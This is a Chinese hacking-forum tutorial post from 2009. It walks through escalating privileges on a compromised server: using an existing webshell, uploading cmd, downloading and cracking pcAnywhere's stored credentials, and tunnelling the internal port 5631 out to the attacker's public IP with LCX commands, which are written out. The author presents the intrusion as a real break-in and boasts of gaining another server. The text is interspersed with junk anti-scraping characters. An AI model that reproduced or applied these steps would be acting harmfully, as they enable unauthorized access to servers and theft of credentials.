|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
5 @" B* `, z, X! L+ Y
4 w0 n, \/ r, M) l8 L提权方法:pcanywhere+LCX
3 d. ^' M) X: w) l% A5 R
& W, T6 J+ g4 O1 T获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。9 ]2 ^" W8 M$ q- r0 w) ?" a
6 m4 c1 m- M4 I4 p
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。; Q9 d; z9 [8 O
3 z9 {3 z5 l2 \7 Y e
" E# ^# r5 `% B0 `) a
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
. }1 Q) Z; j1 M4 B1 e7 `0 w8 y Q( r. |9 G1 {7 d( w
5 }: F4 J- R/ G6 U* d3 E: O
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。0 G" j% D0 p& S, Q6 ?( Z
2 y1 T6 @2 M0 k$ _2 {7 ?6 C
4 I" n( D! \5 z/ h+ u1 t; J- T* R% ?
9 {# N+ g* j8 F) a
" e7 z2 a$ Z$ a8 X2 u( G由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
6 [: @ t- h0 t
" s' _6 I- @, w( J" t
, g9 I2 y5 R/ y* SLCX的用法再简单说下:4 V. h x X& \: {" `
$ F3 S) b. ~2 @3 x' m0 U/ W
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
; j4 a8 ~5 O2 x2 U
0 Y0 ~7 r" i8 v/ S/ ~2 ^本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
$ o9 A5 {$ F0 L& N* y
5 e% f7 }5 _4 a由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。3 o/ w& a. a- Y; x& q! k
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``$ H8 m+ }( |' \
# ]% a! W9 Y, g" D. h4 V) x8 A. f1 ?& ~% q5 C l' q
3 s9 p6 {9 J7 M$ f/ Z6 |6 n& c
. f# ]% M+ c* J% ?1 y呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。/ y( R J. |) R0 c1 b3 Z
7 t1 F, v) m/ M& v( e* \8 a( z$ E' u& u' H$ K" _7 D6 A
/ R( }7 D+ O) V1 e7 C
* s. U" L; u% u3 _! F
我们本地连接试试,输入我们刚破解的账号密码
7 `5 a9 Z1 I0 A6 H
8 }2 Q* h- r! F2 G/ ?& E! q
( T7 W9 o& ~5 N1 Y* y+ X" q. X呵呵``连接成功,服务器不错,又一个8核^︵^$ K6 l K% C# r7 v5 {/ Z: Y
! |/ o) e- b2 s
! I' _- b8 K; @3 {+ N3 L" m. E
* R; X- t3 {& o" K$ { |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
